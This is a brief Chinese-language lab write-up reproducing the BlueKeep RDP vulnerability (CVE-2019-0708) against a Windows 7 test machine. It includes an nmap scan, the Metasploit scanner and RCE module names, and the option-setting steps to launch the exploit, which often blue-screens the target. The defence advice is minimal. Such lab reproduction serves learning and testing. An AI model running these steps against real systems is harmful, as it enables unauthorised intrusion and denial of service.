前期准备
系统 | IP |
---|---|
linux | 192.168.1.56 |
win7 | 192.168.1.57 |
然后打开win7的3389远程连接服务
验证漏洞
可以已经开放了3389远程服务,验证是否存在0708漏洞
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.57
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-07 01:32 EST
Nmap scan report for 192.168.1.57
Host is up (0.0014s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49153/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
验证漏洞模块:auxiliary/scanner/rdp/cve_2019_0708_bluekeep
验证完毕后直接使用攻击模块开始攻击。
复现漏洞
攻击漏洞模块:exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用run开始攻击,等待建立连接
这里大部分会蓝屏
防御漏洞
360
参考文章:
https://www.cnblogs.com/replaceroot/p/11367620.html
https://www.cnblogs.com/feizianquan/p/11481294.html